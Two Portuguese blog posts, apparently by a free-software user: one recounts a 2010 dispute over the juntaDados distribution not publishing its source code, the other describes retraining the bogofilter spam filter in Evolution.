No dia 24/05/2010 eu li sobre a nova revis�o da distribui��o multim�dia juntaDados 1.04r3. Achei interessante porque eu sabia que a Fabiana "Goa" e o Marcelo Souza estavam envolvidos, uma vez que trabalhei no minC e eles fazem parte de um dos Pont�es de Cultura Digital. Lendo sobre a nova revis�o do juntaDados reparei que n�o falava do c�digo fonte, ent�o comentei sobre isso na sala XMPP da MinasLivre. O Gustavo 'kov' Noronha entrou no f�rum e fez um coment�rio perguntando sobre o c�digo fonte. Ele recebeu uma resposta falando que era o mesmo c�digo do Ubuntu e que se ele quisesse era s� pegar os fontes nos mirrors do Ubuntu, porque eles n�o tinham infra-estrutura para manter o c�digo fonte, que na minha opini�o � uma desculpa boba, uma vez que eles podiam gerar um ISO com os fontes (a resposta publicada no dia foi editada e eu n�o tenho a original, mas tenho uma c�pia de seguran�a do que esta publicado hoje).

No dia 21/06/2010 saiu a nova vers�o 2.04 e novamente eles n�o falaram sobre o c�digo fonte. Dessa vez, eu fiz um coment�rio no f�rum. O Thadeu 'GNU' Cascardo aproveitou o coment�rio que fiz e argumentou um pouco mais. Ap�s esse coment�rio a conversa desandou totalmente (ainda bem que fiz essa c�pia de seguran�a). O pessoal do juntaDados editou e apagou v�rios coment�rios e logo em seguida fecharam os coment�rios. Mas o pior, foi apagar todo o hist�rico da conversa algum tempo depois. E para piorar de vez, recebo um email de algu�m do juntaDados com c�pia para o kov e o cascardo. Aqui esta o primeiro email do juntaDados; A resposta do kov; Outro email do juntaDados; A minha resposta ao primeiro email do juntaDados; A minha resposta ao segundo email do juntaDados.

Depois de toda essa confus�o eu decidi publicar toda a hist�ria para documentar o que aconteceu, mas de l� pra c� aconteceram mil coisas e eu acabei me enrolando. Mas antes tarde do que nunca.

Eu sempre me surpreendo quando vejo pessoas que trabalham com Software Livre que n�o sabem receber cr�ticas. N�o quero ser Pol�cia batendo na porta das pessoas, mas custa fazer direito?!

evolution+bogofilter

2009-10-01T21:31:00-03:00

Estou a algumas semanas tentando fazer meu evolution filtrar emails "junk". Instalei o bogofilter, o spamassassin, habilitei os plugins no evolution e marquei todas as mensagens que eram junk (~300), torci pela primeira vez pra receber um spam , ele veio e n�o funcionou. Perguntei pro cascardo e tamb�m para ophractal se eles sabiam como habilitar. O phractal falou que no evolution dele funcionava perfeitamente. Verifiquei com ele e as configura��es estavam iguais. Apaguei a minha wordlist (~/.bogofilter/wordlist.db) e marquei novamente os spams como "junk". Torci pela segunda vez pra receber um spam, ele veio e tamb�m n�o funcionou.

Hoje, lendo a blogada do Jack Wallen, descobri que eu estava treinando errado o meu filtro. � preciso marcar os emails que n�o s�o "junk" como "junk" e depois desmarc�-los. Fiz isso e torci pela terceira vez. O spam veio e foi direto pra minha pasta "junk", yeah!